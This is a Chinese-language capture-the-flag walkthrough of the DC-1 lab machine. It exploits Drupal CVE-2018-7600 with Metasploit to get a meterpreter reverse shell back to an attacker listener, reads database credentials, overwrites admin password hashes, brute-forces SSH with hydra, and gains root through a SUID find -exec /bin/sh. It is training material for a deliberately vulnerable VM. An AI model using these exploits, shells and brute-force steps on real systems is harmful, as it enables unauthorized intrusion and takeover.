靶机页面
信息收集
-
查看DC1的IP地址
查看DC1的MAC地址为00:0C:29:60:07:4F,然后用nmap扫描存活主机,发现DC1的MAC地址对应的IP为192.168.175.148
-
靶机的web页面
-
扫描DC1开启的端口
┌──(kali💋kali)-[~] └─$ sudo nmap -Pn -A -p- -sS -sC -T4 192.168.175.148 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-30 10:57 EDT Nmap scan report for 192.168.175.148 Host is up (0.0012s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) | ssh-hostkey: | 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA) | 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA) |_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Debian)) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.2.22 (Debian) |_http-title: Welcome to Drupal Site | Drupal Site 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 41137/udp status | 100024 1 44638/tcp status | 100024 1 46632/udp6 status |_ 100024 1 53040/tcp6 status 44638/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:60:07:4F (VMware) Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.16 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 1.16 ms 192.168.175.148 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.61 seconds
端口 状态 服务 版本 22 open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) 80 open http Apache httpd 2.2.22 ((Debian)) 111 open rpcbind 2-4 (RPC #100000) 44638 open status 1 (RPC #100024) -
web应用指纹信息
OS Linux 3.x Server Apache/2.2.22 (Debian) X-Powered-By PHP/5.4.45-0+deb7u14 这里发现基于Drupal 7之上的,所以用专用工具扫描器droopescan对网站扫描
-
droopescan扫描
┌──(kali💋kali)-[~/tools/droopescan] └─$ ./droopescan scan drupal -u http://192.168.175.148 1 ⨯ [+] Plugins found: ctools http://192.168.175.148/sites/all/modules/ctools/ http://192.168.175.148/sites/all/modules/ctools/LICENSE.txt http://192.168.175.148/sites/all/modules/ctools/API.txt views http://192.168.175.148/sites/all/modules/views/ http://192.168.175.148/sites/all/modules/views/README.txt http://192.168.175.148/sites/all/modules/views/LICENSE.txt profile http://192.168.175.148/modules/profile/ php http://192.168.175.148/modules/php/ image http://192.168.175.148/modules/image/ [+] Themes found: seven http://192.168.175.148/themes/seven/ garland http://192.168.175.148/themes/garland/ [+] Possible version(s): 7.22 7.23 7.24 7.25 7.26 [+] Possible interesting urls found: Default admin - http://192.168.175.148/user/login [+] Scan finished (0:08:14.470190 elapsed)
-
漏洞扫描报告
发现存在如下漏洞,存在CVE-2014-3704和CVE-2018-7600
序号 Vuln 1 Drupal Core SQL Injection Vulnerability CVE-2014-3704 2 Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)CVE-2018-7600 3 Sensitive File Disclosure (HTTP) 4 Cleartext Transmission of Sensitive Information via HTTP 5 SSH Weak Encryption Algorithms Supported
渗透流程
-
CVE-2018-7600
可以运用远程代码执行漏洞进行Getshell,也可以直接用MSF Getshell,这里用MSF辅助渗透
使用
search drupal
搜索相关的漏洞利用模块利用2018年的那个cve进行Getshell,使用use 1装载模块进行渗透
msf6 > use 1 [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options Module options (exploit/unix/webapp/drupal_drupalgeddon2): Name Current Setting Required Description ---- --------------- -------- ----------- DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.175.144 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic (PHP In-Memory) msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.175.148 rhosts => 192.168.175.148 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options Module options (exploit/unix/webapp/drupal_drupalgeddon2): Name Current Setting Required Description ---- --------------- -------- ----------- DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.175.148 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.175.144 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic (PHP In-Memory) msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit [*] Started reverse TCP handler on 192.168.175.144:4444 [*] Executing automatic check (disable AutoCheck to override) [!] The service is running, but could not be validated. [*] Sending stage (39282 bytes) to 192.168.175.148 [*] Meterpreter session 1 opened (192.168.175.144:4444 -> 192.168.175.148:33015) at 2023-03-30 12:09:16 -0400
Getshell
获取交互shell,这样稳定一些
python -c 'import pty; pty.spawn("/bin/bash")'
接下来我们看看有什么文件,发现有个flag1.txt
查看flag1.txt
每个好的 CMS 都需要一个配置文件 - 你也一样。
根据提示,需要看一下drupal的配置文件,网上查找drupal的配置文件为settings.php
然后查看settings.php,发现flag2,看到数据库名为dbuser,密码为R0ck3t
www-data@DC-1:/var/www/sites/default$ cat settings.php cat settings.php <?php /** * * flag2 * Brute force and dictionary attacks aren't the * only ways to gain access (and you WILL need access). * What can you do with these credentials? * */ $databases = array ( 'default' => array ( 'default' => array ( 'database' => 'drupaldb', 'username' => 'dbuser', 'password' => 'R0ck3t', 'host' => 'localhost', 'port' => '', 'driver' => 'mysql', 'prefix' => '', ), ), );
接下来我们就连接数据库
mysql -udbuser -pR0ck3t
发现存在drupaldb这个数据库
然后发现它有个users表,猜测账户名和密码可能存在在这个表里
果然存在一个账户名为admin,但是密码为hash加密值无法利用,但可以对数据库进行用update来修改用户密码。
drupal默认使用password_hash.sh生成密码,参考文章
update users set pass="$S$DtiZnUFHDz.DS54lIrOfYnyKmuN1keAwlBplfIILOa0frxvNdx8H"; #把users里面的所有pass的值改为$S$DtiZnUFHDz.DS54lIrOfYnyKmuN1keAwlBplfIILOa0frxvNdx8H(解码后为admin)
接下来我们就可以进行登录了
登录进行对页面的功能进行探索,发现flag3
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow. 特殊 PERMS 将有助于找到密码 - 但您需要执行该命令才能弄清楚如何获取阴影中的内容。
接着查看了home目录,发现了flag4
Can you use this same method to find or access the flag in root? Probably. But perhaps it's not that easy. Or maybe it is? 你能用同样的方法在根目录中查找或访问标志吗? 可能但也许这并没有那么容易。或者可能是这样?
flag4提示的无头绪,但是flag3那里提示了“特殊 PERMS ”和“shadow”,于是查看/etc/shadow文件显示没权限,但是可以查看/etc/passwd,发现有个flag4用户,然后上面信息收集看到它有开22端口,那么接下来可以试试找到flag4用户的密码进行ssh连接
SSH爆破密码
这里借助hadry爆破
这里用的密码字典
hydra ssh://192.168.175.148 -l flag4 -P /usr/share/john/password/lst -vV -f -t 64 #-vV显示爆破过程 #-f 爆破成功则停止后面的爆破 #-t 爆破速度
爆破出flag4的密码为orange,接下来进行ssh连接,连接成功,并查看了/etc/shadow文件看看flag4是否高权限,很遗憾显示flag4不是搞权限,接下来就要进行提权了
权限提升
获取root权限
提权思路
利用系统内核漏洞提权
sudo 权限泄露
利用SUID 提权
但是flag3提示了 PERMS,那这里就可以利用SUID提权
什么时SUID提权呢
比如find命令,运行find命令时有SUID标识,SUID标识会继承root权限,就好比A信任B,B信任C,那么A就可以间接的信任C,信任是具有传递性的 有SUID标识的命令调用B命令运行,SUID标识的命令调用B命令期间SUID标识的命令获取root权限,B命令也获取了root权限
查找具有SUID 标识的命令
find / -perm -4000 2>/dev/null
发现有find命令具有SUID标识,所以我们就对find命令进行提权
先创建一个目录,在进行find命令提权
mkdir tacoking find tacoking -exec /bin/sh \; #-exec可以调用外部命令,find命令调用/bin/sh,/bin/sh具有root权限,传递给find命令,因为tacoking目录为空目录,所以它就会find一次
提权成功后进入root目录,发现有一个thefinalflag.txt,查看它即可查看最终flag
tips
因为这里是利用MSF来直接Getshell,没有展示CVE-2014-3704和CVE-2018-7600漏洞详情。大家有兴趣的可以查看这两篇文章